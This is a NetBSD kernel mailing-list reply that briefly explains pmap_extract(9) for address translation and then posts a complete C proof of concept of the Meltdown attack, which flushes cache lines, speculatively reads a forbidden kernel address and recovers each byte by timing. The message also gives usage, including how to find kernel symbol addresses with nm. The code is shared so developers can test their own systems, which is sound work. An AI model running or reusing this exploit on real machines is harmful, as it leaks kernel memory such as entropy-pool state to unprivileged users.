tech-kern archive

Re: virtual to physical memory address translation



> Date: Mon, 15 Jan 2018 12:47:52 +0000
> From: Emmanuel Dreyfus <manu%netbsd.org@localhost>
> 
> Sorry if that has been covered ad nauseam, but I cannot find relevant
> information about that: on NetBSD, how can I get the physical memory
> address given a virtual memory address? This is to port the Linux
> Meltdown PoC so that we have something to test our systems against.
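
(To the question as literally asked: in kernel context, pmap_extract(9)
is the usual way to translate a virtual address to a physical one; I
don't know of a userland interface for it.  A rough sketch, assuming
kernel context -- the helper name va_to_pa is made up:

	#include <sys/param.h>
	#include <uvm/uvm_extern.h>

	static paddr_t
	va_to_pa(vaddr_t va)
	{
		paddr_t pa;

		/* Ask the kernel pmap whether va is mapped, and where.  */
		if (!pmap_extract(pmap_kernel(), va, &pa))
			return 0;	/* no mapping */
		return pa;
	}

That doesn't help from unprivileged userland, though.)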

Here's a PoC that doesn't need vtophys mapping.  It can read any data
out of the cache line of rnd_global.pool.stats.curentropy from
unprivileged userland.  You can find these addresses and confirm the
data read with the help of crash(8).  Example usage:

   ./meltdown 0xffffffff80f20300 64 | hexdump -C
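
(One way to get the base address, assuming the booted kernel image is
/netbsd and still has its symbol table, is nm(1):

   nm /netbsd | grep rnd_global

The field offset within the struct still has to be added; crash(8), as
above, can confirm both the address and the data read.)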

If adapted slightly, root can be taught to read from more cache lines,
possibly reaching into the entropy pool data itself -- which, of
course, it could read anyway from /dev/kmem.

I have not figured out how to make it read anything that is not
already cached a priori, though I haven't tried the physical memory
mappings.

/*-
 * Copyright (c) 2018 Taylor R. Campbell
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 */

#include <sys/ioctl.h>
#include <sys/rnd.h>

#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <inttypes.h>
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

const unsigned		pgsz = 4096;
const unsigned		ntrials = 20;

jmp_buf			reset;
uint64_t		kaddr;
uint8_t			*kptr;
uint8_t			ubuf[4096*(256 + 2)]; /* guard pages on either end */
uint8_t			*uptr = ubuf + 4096;
unsigned		vote[256];

/*
 * rdtsc_fenced()
 *
 *	Wait for all prior CPU instructions to complete and then return
 *	the CPU cycle counter.
 */
static inline uint64_t
rdtsc_fenced(void)
{
	uint32_t lo, hi;

	/*
	 * rdtscp works if we have it, but not all x86 CPUs have it.
	 * On Intel, lfence is sufficient; on AMD, mfence is needed.
	 */
	asm volatile("mfence; rdtsc" : "=a"(lo), "=d"(hi));

	return ((uint64_t)hi << 32) | lo;
}

/*
 * clflush(ptr)
 *
 *	Flush the data cache line for ptr if any.
 */
static inline void
clflush(const void *ptr)
{

	asm volatile("clflush (%0)" : : "r"(ptr));
}

/*
 * meltdown(k, u)
 *
 *	Prime u[pgsz*k[0]] in the cache and leave u[pgsz*i] for all i
 *	=/= k[0] alone.  k may be a forbidden pointer anywhere in the
 *	virtual address space, such as a pointer into kernel memory
 *	without the `u' (user-accessible) page permission bit.
 */
static inline uint8_t
meltdown(const uint8_t *k, const uint8_t *u)
{
	unsigned long i;
	uint8_t v;

	do i = pgsz*k[0]; while (i == 0);
	v = u[i];

	return v;
}

/*
 * sighandler(signo)
 *
 *	Vote on which byte in the global user buffer seemed to be
 *	primed by speculative execution that ran ahead of the CPU trap
 *	causing signal delivery.  Then longjmp back to your regularly
 *	scheduled programming.
 */
static void
sighandler(int signo)
{
	uint64_t t0, t1, tmin;
	unsigned i, imin;
	volatile uint8_t ubyte;

	(void)signo;

	tmin = UINT64_MAX;
	imin = 0;
	for (i = 0; i < 256; i++) {
		t0 = rdtsc_fenced();
		ubyte = uptr[pgsz*i];
		t1 = rdtsc_fenced();
		if (t1 - t0 <= tmin) {
			tmin = t1 - t0;
			imin = i;
		}
	}
	vote[imin]++;
	longjmp(reset, 1);
}

/*
 * prime()
 *
 *	Prime the CPU cache for the target kernel address.  In this
 *	case, we try to prime it for rnd_pool.stats.curentropy, which
 *	is allowed to be read by the user but surrounded by pool
 *	statistics that are forbidden.
 *
 *	Also nearby is the actual data in the entropy pool -- but it's
 *	the next cache line over, alas, and my CPU doesn't seem to be
 *	prefetching surrounding cache lines.
 */
static void
prime(void)
{
	static int fd = -1;
	uint32_t entcnt;

	/* Make sure we have opened /dev/urandom.  */
	if (fd == -1) {
		if ((fd = open("/dev/urandom", O_RDONLY)) == -1)
			err(1, "open /dev/urandom");
	}

	/*
	 * Don't care what the answer is; just ask the kernel to do
	 * something for us.
	 */
	(void)ioctl(fd, RNDGETENTCNT, &entcnt);
}

int
main(int argc, char **argv)
{
	volatile unsigned trial; /* for setjmp */
	volatile uint8_t ubyte;	 /* to thwart optimization */
	char *end;
	unsigned long count = 1;
	unsigned i, ibest, vbest;

	/* Set up progname and usage.  */
	setprogname(argv[0]);
	if (argc != 2 && argc != 3)
		errx(1, "usage: %s <addr> [<count>]", getprogname());

	/* Parse the address.  */
	errno = 0;
	kaddr = strtoumax(argv[1], &end, 0);
	if (end == argv[1] || end[0] != '\0' || errno)
		errx(1, "invalid address");
	kptr = (void *)(uintptr_t)kaddr;

	/* Parse the count, if any.  */
	if (argc == 3) {
		errno = 0;
		count = strtoul(argv[2], &end, 0);
		if (end == argv[2] || end[0] != '\0' || errno)
			errx(1, "invalid count");
	}

	/* For as many bytes as requested...  */
	while (count --> 0) {

		/* Prepare to handle SIGSEGV.  */
		if (signal(SIGSEGV, &sighandler) == SIG_ERR)
			err(1, "signal");

		/* Dry run to ramp up the CPU.  */
		for (trial = 0; trial < ntrials; trial++) {
			if (setjmp(reset) == 0) {
				for (i = 0; i < 256; i++)
					clflush(&uptr[i*pgsz]);
				register uint8_t *uptr0 = uptr;
				register uint8_t *kptr0 = kptr;
				prime();
				ubyte = meltdown(kptr0, uptr0);
				return 123; /* fail */
			}
		}

		/* Reset the vote tallies.  */
		memset(vote, 0, sizeof vote);

		/* Do it!  */
		for (trial = 0; trial < ntrials; trial++) {
			if (setjmp(reset) == 0) {
				for (i = 0; i < 256; i++)
					clflush(&uptr[i*pgsz]);
				register uint8_t *uptr0 = uptr;
				register uint8_t *kptr0 = kptr;
				prime();
				ubyte = meltdown(kptr0, uptr0);
				return 123; /* fail */
			}
		}

		/* Restore SIGSEGV to default to catch bugs later.  */
		if (signal(SIGSEGV, SIG_DFL) == SIG_ERR)
			err(1, "signal");

		/* Naively count the ballots.  */
		ibest = 0;
		vbest = vote[0];
		for (i = 0; i < 256; i++) {
			if (vote[i] > vbest) {
				ibest = i;
				vbest = vote[i];
			}
		}

		/*
		 * Heuristically guess that if the plurality is not a
		 * majority, we probably got fooled by zero.
		 */
		if (vbest < ntrials/2)
			ibest = 0;

		/* Print the winner.  */
		if (printf("%c", (char)ibest) < 0)
			err(1, "printf");

		/* Advance to the next byte.  */
		kptr++;
	}

	/* Success!  */
	return 0;
}

